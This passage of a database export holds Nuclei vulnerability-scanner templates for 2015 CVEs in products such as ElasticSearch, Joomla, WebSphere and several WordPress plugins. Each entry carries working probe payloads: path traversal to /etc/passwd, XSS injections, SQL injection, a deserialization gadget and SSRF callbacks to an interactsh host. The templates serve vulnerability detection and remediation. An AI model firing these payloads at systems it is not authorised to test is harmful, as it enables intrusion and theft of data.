severity: medium\n description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.\n impact: |\n An attacker can exploit this vulnerability to read sensitive information from the server, such as database credentials, and potentially execute arbitrary code.\n remediation: Upgrade to Swim Team version 1.45 or newer.\n reference:\n - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568\n - http://www.vapid.dhs.org/advisory.php?v=134\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5471\n - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html\n - http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2015-5471\n cwe-id: CWE-22\n epss-score: 0.10406\n epss-percentile: 0.94855\n cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: swim_team_project\n product: swim_team\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-swimteam\"\n tags: cve2015,cve,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202cd291f5c987553fe7226cae955afcf8510a3d8336df8bd95ef30fd3b37acd6202210087d411bcb4248de1f5e045aa50a4ca6aee4f54950d3be9be44c2d64bd8b69287:922c64590222798bb761d5b6d8e72950", "hash": "dadde2181a6f552e0cbe46510b413e5d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f60" }, "name": "CVE-2015-5531.yaml", "content": "id: 
CVE-2015-5531\n\ninfo:\n name: ElasticSearch <1.6.1 - Local File Inclusion\n author: princechaddha\n severity: medium\n description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5531\n - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html\n - https://www.elastic.co/community/security/\n - http://packetstormsecurity.com/files/133797/ElasticSearch-Path-Traversal-Arbitrary-File-Download.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-5531\n cwe-id: CWE-22\n epss-score: 0.97144\n epss-percentile: 0.99783\n cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: elasticsearch\n product: elasticsearch\n tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive\n\nhttp:\n - raw:\n - |\n PUT /_snapshot/test HTTP/1.1\n Host: {{Hostname}}\n\n {\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"/usr/share/elasticsearch/repo/test\"\n }\n }\n - |\n PUT /_snapshot/test2 HTTP/1.1\n Host: {{Hostname}}\n\n {\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n }\n }\n - |\n GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ElasticsearchParseException\n - Failed to derive xcontent from\n - 114, 111, 111, 116, 58\n condition: and\n\n - 
type: status\n status:\n - 400\n# digest: 490a0046304402207c1a1828c260cd9afadd9844c9419a43cc0071d0c854a31ad8e4b6fabcb4d3720220461e43e06c10d317f6b91bfe48ee71c3848bd2d8dcb41ea01f454d3f3281c01a:922c64590222798bb761d5b6d8e72950", "hash": "88453cac999936daf43a24c73d685be4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f61" }, "name": "CVE-2015-5688.yaml", "content": "id: CVE-2015-5688\n\ninfo:\n name: Geddy <13.0.8 - Local File Inclusion\n author: pikpikcu\n severity: medium\n description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.\n impact: |\n The vulnerability can be exploited to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.\n remediation: |\n Upgrade Geddy to version 13.0.8 or later to mitigate the vulnerability.\n reference:\n - https://nodesecurity.io/advisories/geddy-directory-traversal\n - https://github.com/geddy/geddy/issues/697\n - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5688\n - https://github.com/geddy/geddy/pull/699\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-5688\n cwe-id: CWE-22\n epss-score: 0.01347\n epss-percentile: 0.84665\n cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: geddyjs\n product: geddy\n framework: node.js\n tags: cve2015,cve,geddy,lfi,geddyjs,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502205488f218bf2c3c7f54b39eb4a23b2b8168ef4c98f3be02378805ef5f6d92965c022100a55527149f23f2bf1990d33ec040e1260b8a1583966e4680161b9a31a65e5d28:922c64590222798bb761d5b6d8e72950", "hash": "79da334db2547ecc60d6ba4c6dc7ad8f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f62" }, "name": "CVE-2015-6477.yaml", "content": "id: CVE-2015-6477\n\ninfo:\n name: Nordex NC2 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2015/Dec/117\n - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01\n - https://nvd.nist.gov/vuln/detail/CVE-2015-6477\n - http://packetstormsecurity.com/files/135068/Nordex-Control-2-NC2-SCADA-16-Cross-Site-Scripting.html\n - http://seclists.org/fulldisclosure/2015/Dec/117\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-6477\n cwe-id: CWE-79\n epss-score: 0.00277\n epss-percentile: 0.64954\n cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nordex\n product: nordex_control_2_scada\n tags: cve2015,cve,seclists,packetstorm,xss,iot,nordex,nc2\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/login\"\n\n body: 
'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"\"\n# digest: 4a0a00473045022100f172e6a8b04574670491e79e79a2c9354eb33e7efdcd15e04ee77d95c0d065e602207e351f4b898601051e7cc3a381f3a71ae71cfd449968bc2d3808cb90fc44b49f:922c64590222798bb761d5b6d8e72950", "hash": "1b4b2685a603aaf67392ca01ad6aea51", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f63" }, "name": "CVE-2015-6544.yaml", "content": "id: CVE-2015-6544\n\ninfo:\n name: Combodo iTop <2.2.0-2459 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a version of Combodo iTop that is equal to or greater than 2.2.0-2459 to mitigate this vulnerability.\n reference:\n - https://www.htbridge.com/advisory/HTB23268\n - http://sourceforge.net/p/itop/tickets/1114/\n - http://sourceforge.net/p/itop/code/3662/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-6544\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2015-6544\n cwe-id: CWE-79\n epss-score: 0.00284\n epss-percentile: 0.65327\n cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: combodo\n product: itop\n tags: cve2015,cve,xss,itop,combodo\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022013f90d189ae5ac5476831a4927449c347bfbaa93302d536ceaebce970c524d5e0221008b3dd9695bcfbefd887835ce46562a46310858a81f115f521bd1b06ae4faeab1:922c64590222798bb761d5b6d8e72950", "hash": "4b8c5d57be92f38c5613904d3c3c7ed5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f64" }, "name": "CVE-2015-6920.yaml", "content": "id: CVE-2015-6920\n\ninfo:\n name: WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability.\n remediation: |\n Upgrade to the latest version of WordPress sourceAFRICA (>=0.1.4) which includes a fix for this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html\n - https://wpvulndb.com/vulnerabilities/8169\n - https://nvd.nist.gov/vuln/detail/CVE-2015-6920\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-6920\n cwe-id: CWE-79\n epss-score: 0.0016\n epss-percentile: 0.52637\n cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: sourceafrica_project\n product: sourceafrica\n framework: wordpress\n tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n 
words:\n - 'SourceAfrica'\n - 'Tags:'\n condition: and\n case-insensitive: true\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009cba36ff243cc2b1d9c4a151b396958b4caf82584c82cf9f9e9b6892d403cf6c022018312ae7e0cb0e95f6fbd1cb4d1062102feb8dfab9b1cf125d3da648ffdde45f:922c64590222798bb761d5b6d8e72950", "hash": "9a1a09e8ccea3f1194b1166a07c47846", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f65" }, "name": "CVE-2015-7245.yaml", "content": "id: CVE-2015-7245\n\ninfo:\n name: D-Link DVG-N5402SP - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. 
(dot dot) in the errorpage parameter.\n impact: |\n An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information.\n remediation: |\n Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability.\n reference:\n - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html\n - https://www.exploit-db.com/exploits/39409/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7245\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-7245\n cwe-id: CWE-22\n epss-score: 0.96881\n epss-percentile: 0.99685\n cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: d-link\n product: dvg-n5402sp_firmware\n tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link\n\nhttp:\n - raw:\n - |\n POST /cgibin/webproc HTTP/1.1\n Host: {{Hostname}}\n\n getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a00473045022100d1aafb8c10f1a664ef200cb0b07719e65cca20f646b773edd9631bbd351283b102206cf94666854313f20d7360c569b2d3fa912b5887a16ae63b1dcf827a26d04341:922c64590222798bb761d5b6d8e72950", "hash": "b046b53c54b0e6499237e05664a8d5a3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f66" }, "name": "CVE-2015-7297.yaml", "content": "id: CVE-2015-7297\n\ninfo:\n name: Joomla! Core SQL Injection\n author: princechaddha\n severity: high\n description: A SQL injection vulnerability in Joomla! 
3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Joomla! CMS.\n remediation: |\n Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7297\n - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html\n - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/\n - http://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.html\n - http://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2015-7297\n cwe-id: CWE-89\n epss-score: 0.97564\n epss-percentile: 0.99999\n cpe: cpe:2.3:a:joomla:joomla\\!:3.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\\!\n tags: cve2015,cve,packetstorm,joomla,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)\"\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4b0a00483046022100a76121fd34a701a623fe02d8de446a12a363ff654c9fa1639ad529008c43117a022100e533be8c3fc95b05cc0cc6b3128a8fd970c943c5846fc163dc941f2849144f4d:922c64590222798bb761d5b6d8e72950", "hash": "0d9044e8e46469c1d48c7bea7cb8ec8f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f67" }, "name": "CVE-2015-7377.yaml", "content": "id: CVE-2015-7377\n\ninfo:\n name: WordPress Pie-Register <2.0.19 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: 
WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Pie-Register plugin (2.0.19 or higher) to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html\n - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7377\n - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html\n - https://wpvulndb.com/vulnerabilities/8212\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-7377\n cwe-id: CWE-79\n epss-score: 0.00232\n epss-percentile: 0.60606\n cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: genetechsolutions\n product: pie_register\n framework: wordpress\n tags: cve,cve2015,wordpress,wp-plugin,xss,packetstorm,genetechsolutions\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220751822cd9a64218d991be21596af65185eb0cb7a0ce6a8784d0b16b796f15a2d02204fc11d32d252a9e44ee7344d48136104c33912494230c2b75ff8a3c2229b7761:922c64590222798bb761d5b6d8e72950", "hash": "e6f5d8be8ca98b32ef890d343b32be5c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f68" }, "name": "CVE-2015-7450.yaml", "content": "id: CVE-2015-7450\n\ninfo:\n name: IBM WebSphere Java Object Deserialization - Remote Code Execution\n author: wdahlenb\n severity: critical\n description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by IBM to mitigate this vulnerability.\n reference:\n - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py\n - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7450\n - http://www-01.ibm.com/support/docview.wss?uid=swg21972799\n - http://www-01.ibm.com/support/docview.wss?uid=swg21970575\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2015-7450\n cwe-id: CWE-94\n epss-score: 0.97122\n epss-percentile: 0.99772\n cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ibm\n product: tivoli_common_reporting\n shodan-query: http.html:\"IBM WebSphere Portal\"\n tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml; charset=utf-8\n SOAPAction: \"urn:AdminService\"\n\n \n \n \n \n \n \n 
rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\n getUnsavedChanges\n {{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}\n rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'SOAP-ENV:Server'\n - ''\n condition: and\n\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: status\n status:\n - 500\n# digest: 4a0a0047304502202263d3f945c0708bfa178b6c8d0508154a99c03081669fa093be19203c3a7e5b022100e9aa4c463965277d6a051f7f0feb71096361d86520eaab7a85c0efda4d469699:922c64590222798bb761d5b6d8e72950", "hash": "f0dafb47fd3c619c4e6ac3f647b257d1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f69" }, "name": "CVE-2015-7780.yaml", "content": "id: CVE-2015-7780\n\ninfo:\n name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/35933\n - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html\n - http://jvn.jp/en/jp/JVN21968837/index.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7780\n - https://github.com/ARPSyndicate/kenzer-templates\n 
classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2015-7780\n cwe-id: CWE-22\n epss-score: 0.00151\n epss-percentile: 0.50407\n cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: manageengine_firewall_analyzer\n tags: cve2015,cve,manageengine,edb,lfi,zohocorp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"java.sun.com\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022033310ce04e506b0032c6fb7238353cd6100a3065b45f93695cea8aa316876c630220603da199c7554c8cf879f5ebe7a88fbe5d407438fc5352e3673a1bf713b3685a:922c64590222798bb761d5b6d8e72950", "hash": "9573fadab1ed82d9df02edee894884a5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f6a" }, "name": "CVE-2015-7823.yaml", "content": "id: CVE-2015-7823\n\ninfo:\n name: Kentico CMS 8.2 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. 
An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Kentico CMS.\n reference:\n - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7823\n - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2015-7823\n cwe-id: NVD-CWE-Other\n epss-score: 0.00233\n epss-percentile: 0.61409\n cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kentico\n product: kentico_cms\n tags: cve2015,cve,kentico,redirect,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a004830460221009e8f50b85daa26e3fc8e68ec98b52d6c22a387e1dfa6ab6e91be8ce1b8508ab3022100ade33462a8ca04ef6ae72e63331f1d1880a4ba45f2ea2180ff659181ccbb5b57:922c64590222798bb761d5b6d8e72950", "hash": "fa5542a7b9f80efd6ca947e355bb56a9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f6b" }, "name": "CVE-2015-8349.yaml", "content": "id: CVE-2015-8349\n\ninfo:\n name: SourceBans <2.0 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.\n 
description: Atlassian Confluence before 5.8.17 contains an information disclosure vulnerability. 
A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. Note that the check below requests spaces/viewdefaultdecorator.action without any credentials, so it only matches on instances that expose that action anonymously.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information.\n remediation: |\n Upgrade to Confluence 5.8.17 or later, which is not affected.\n
impact: |\n The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.\n remediation: |\n Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.\n reference:\n - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-8813\n - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce\n - http://www.openwall.com/lists/oss-security/2016/02/18/8\n - http://issues.umbraco.org/issue/U4-7457\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N\n cvss-score: 8.2\n cve-id: CVE-2015-8813\n cwe-id: CWE-918\n epss-score: 0.00511\n epss-percentile: 0.74145\n cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: umbraco\n product: umbraco\n tags: cve2015,cve,ssrf,oast,umbraco\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}\"\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022050b2f2d4cb0362670660a3a3f24d8775d24b3371b3eac800eec120eca261c2a0022100e10e0949da402a2150d79e9c16d50a38e202ff6c8b4e3c1eecbd5789c9322910:922c64590222798bb761d5b6d8e72950", "hash": "abb5529d19b0f50621190987356361f3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f6e" }, "name": "CVE-2015-9312.yaml", "content": "id: CVE-2015-9312\n\ninfo:\n name: NewStatPress <=1.0.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file \"includes/nsp_search.php\", several variables from the $_GET scope without sanitation. 
